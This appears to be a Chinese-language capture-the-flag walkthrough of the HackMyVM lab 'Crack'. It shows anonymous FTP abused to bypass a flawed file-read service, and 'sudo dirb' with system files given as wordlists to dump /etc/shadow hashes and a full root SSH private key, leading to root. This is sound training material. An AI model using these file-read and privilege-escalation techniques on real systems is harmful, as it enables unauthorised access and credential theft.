HackMyVM Crack
信息收集
┌──(kali㉿kali)-[~]
└─$ nmap -p0-65535 192.168.100.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-04 11:08 EDT
Nmap scan report for 192.168.100.55
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
4200/tcp open vrml-multi-use
12359/tcp open unknown
MAC Address: 08:00:27:90:73:E2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 5.72 seconds详细扫一下
┌──(kali㉿kali)-[~]
└─$ nmap -p21,4200,12359 -sC -sV 192.168.100.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-04 11:12 EDT
Nmap scan report for 192.168.100.55
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.100.100
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Jun 07 2023 upload [NSE: writeable]
4200/tcp open ssl/http ShellInABox
|_http-title: Shell In A Box
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=crack
| Not valid before: 2023-06-07T10:20:13
|_Not valid after: 2043-06-02T10:20:13
12359/tcp open unknown
| fingerprint-strings:
| GenericLines:
| File to read:NOFile to read:
| NULL:
|_ File to read:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port12359-TCP:V=7.95%I=7%D=5/4%Time=681783E9%P=x86_64-pc-linux-gnu%r(NU
SF:LL,D,"File\x20to\x20read:")%r(GenericLines,1C,"File\x20to\x20read:NOFil
SF:e\x20to\x20read:");
MAC Address: 08:00:27:90:73:E2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.86 seconds21: 可以发现 FTP 可以匿名访问 upload/下有一个crack.py
import os
import socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)
c, addr = s.accept()
no = "NO"
while True:
try:
c.send('File to read:'.encode())
data = c.recv(1024)
file = (str(data, 'utf-8').strip())
filename = os.path.basename(file)
check = "/srv/ftp/upload/"+filename
if os.path.isfile(check) and os.path.isfile(file):
f = open(file,"r")
lines = f.readlines()
lines = str(lines)
lines = lines.encode()
c.send(lines)
else:
c.send(no.encode())
except ConnectionResetError:
pass4200: 是一个 web 是一个终端
12359: nc 过去后File to read: 是 ftp 中的py 脚本 脚本中有一些限制
┌──(kali㉿kali)-[~]
└─$ nc 192.168.100.55 12359
File to read:/etc/passwd
NOFile to read:/etc/passwd
NOFile to read:GetShell
file = (str(data, 'utf-8').strip())
filename = os.path.basename(file)
check = "/srv/ftp/upload/"+filename
if os.path.isfile(check) and os.path.isfile(file):
f = open(file,"r")
...可以发现他检查了一下这个文件是否在 ftp/upload 和 我输入的路径中存在, 居然最终去读我输入的路径
那么就很简单了, 只需要在 ftp/upload 中上传一个我想看的文件 (比如 /etc/passwd) 就可以读取到了
┌──(kali㉿kali)-[~]
└─$ lftp 192.168.100.55 -u Anonymous
密码:
lftp [email protected]:~> ls
drwxrwxrwx 2 0 0 4096 May 04 17:49 upload
lftp [email protected]:/> cd upload
lftp [email protected]:/upload> put passwd
lftp [email protected]:/upload> ls
-rwxr-xr-x 1 1000 1000 849 Jun 07 2023 crack.py
-rw------- 1 107 114 0 May 04 18:08 passwd
lftp [email protected]:/upload>┌──(kali㉿kali)-[~]
└─$ nc 192.168.100.55 12359
File to read:/etc/passwd
['root:x:0:0:root:/root:/bin/bash\n', 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n', 'bin:x:2:2:bin:/bin:/usr/sbin/nologin\n', 'sys:x:3:3:sys:/dev:/usr/sbin/nologin\n', 'sync:x:4:65534:sync:/bin:/bin/sync\n', 'games:x:5:60:games:/usr/games:/usr/sbin/nologin\n', 'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n', 'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n', 'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n', 'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n', 'uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n', 'proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n', 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n', 'backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n', 'list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n', 'irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n', 'gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n', 'nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n', '_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n', 'systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\n', 'systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\n', 'messagebus:x:103:109::/nonexistent:/usr/sbin/nologin\n', 'systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\n', 'sshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n', 'cris:x:1000:1000:cris,,,:/home/cris:/bin/bash\n', 'systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\n', 'shellinabox:x:106:112:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin\n', 'ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin\n']root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
cris:x:1000:1000:cris,,,:/home/cris:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
shellinabox:x:106:112:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologinuser 可登录的 只有 cris 暂时没想到密码会在哪里, 猜测可能是弱口令
回到 4200 web 尝试登录 尝试后发现 密码就是 cris
网页上的 shell 卡卡的 不知道为什么
所以我用 socat 转发了一下 22 端口连 ssh 了
UserFlag
cris@crack:~$ id
uid=1000(cris) gid=1000(cris) grupos=1000(cris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
cris@crack:~$ cat user.txt
eG4TUsTBxSFjTOPHMVRoot 提权
cris@crack:~$ sudo -l
Matching Defaults entries for cris on crack:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cris may run the following commands on crack:
(ALL) NOPASSWD: /usr/bin/dirbsudo -l 后发现dirb 那很明显了,肯定是任意文件读取
cris@crack:~$ sudo dirb https://127.0.0.1:4200 /etc/shadow -v
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 4 18:28:50 2025
URL_BASE: https://127.0.0.1:4200/
WORDLIST_FILES: /etc/shadow
OPTION: Show Not Existent Pages
-----------------
GENERATED WORDS: 28
---- Scanning URL: https://127.0.0.1:4200/ ----
+ https://127.0.0.1:4200/root:$y$j9T$LVT9GIrLdk5L.xns1akJZ1$wmigJ7er07AT/VwIAuYSZ3j94LOCe8EJHC6d2mlZVo3:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/daemon:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/bin:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/sys:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/sync:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/games:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/man:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/lp:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/mail:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/news:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/uucp:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/proxy:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/www-data:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/backup:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/list:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/irc:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/gnats:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/nobody:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/_apt:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/systemd-network:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/systemd-resolve:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/messagebus:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/systemd-timesync:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/sshd:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/cris:$y$j9T$kFXVxpRhH2ZAeDGNazqRq/$IokBR4XhhyRJOur8YOHu3fF59/0NOHC5AIsvkxXx8..:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/systemd-coredump:!*:19515:::::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/shellinabox:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/ftp:*:19515:0:99999:7::: (CODE:404|SIZE:356)
-----------------
END_TIME: Sun May 4 18:28:50 2025
DOWNLOADED: 28 - FOUND: 0把/etc/shadow 指定为字典就能带出来了
但是root 密码用 john 没有跑出来
尝试直接读rootflag 失败了, 没有找到 root.txt
再读了一下私钥 读出来了
cris@crack:~$ sudo dirb https://127.0.0.1:4200 /root/.ssh/id_rsa -v
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 4 18:40:32 2025
URL_BASE: https://127.0.0.1:4200/
WORDLIST_FILES: /root/.ssh/id_rsa
OPTION: Show Not Existent Pages
-----------------
GENERATED WORDS: 38
---- Scanning URL: https://127.0.0.1:4200/ ----
+ https://127.0.0.1:4200/-----BEGIN (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/xNQ8NxRO4/bC1v90lUrhyLi/ML5B4nak+5vLFJi8NlwXMQJ/xCWZg5+WOLduFp4VvHlwAf (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/tDh2C+tJp2hqusW1jZRqSXspCfKLPt/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k (CODE:404|SIZE:356)
+ https://127.0.0.1:4200//+FwJbMna8iPwmvK6n/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/Kn2aZN/8xWAB+/t96TcXogtSbQw/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3/Cb34a/6v8c (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/9rMjGl9HMZFDwswzAGrvPOeroVB/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2 (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/EAAAGBAMQb0XtxB+u8vYyLdq8Gu/bbzw8Jm9lpmL/HMz5+G4EgqRZoQ8h8J29CFMssN4j0 (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2 (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/wtb/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP/hcCWzJ2vI (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/j8Jryup/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/b2FK7qDomlEWLqc7scNuUWqNEm/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf/MVg (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN/wm9+Gv+r/HPazIxpfRzGR (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2 (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa/ (CODE:200|SIZE:5215)
+ https://127.0.0.1:4200/a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR/3uSMN (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/peiKDzLI/Y+QcQku/7GmUIV4ugP0fjMnz/XcXqe6GVNX/gvNeT6WfKPCzcaXiF4I2i228u (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf/yUyK04a6mhFg3kJzsxE+iDOVH28D (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/wQDlr9NWE6q1BovNNobebvw44NdBRQE/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/0MoSXZXiC/0/CSfe6Je7unnIzhiA85jSe/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/1ROwaN5uL26gIgtf/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/0sTQ3d/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1 (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl (CODE:404|SIZE:356)
+ https://127.0.0.1:4200//RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/oxY6YRERurpcyYuSa/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/6xpD9lHWyp+ocD/meYC7V8aio/W9VxL25NlYwdFyCgecd/rIJQ+tGPXoqXIKrf5lVrVtFC (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s= (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/-----END (CODE:404|SIZE:356)
-----------------
END_TIME: Sun May 4 18:40:32 2025
DOWNLOADED: 38 - FOUND: 1-----BEGIN OPENSSH PRIVATE KEY-----
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
s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=
-----END OPENSSH PRIVATE KEY-----修改一下格式就可以直接登录了
RootFlag
root@crack:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@crack:~# cat root_fl4g.txt
wRt2xlFjcYqXXo4HMV总结
难度尚可, 适合我这种菜b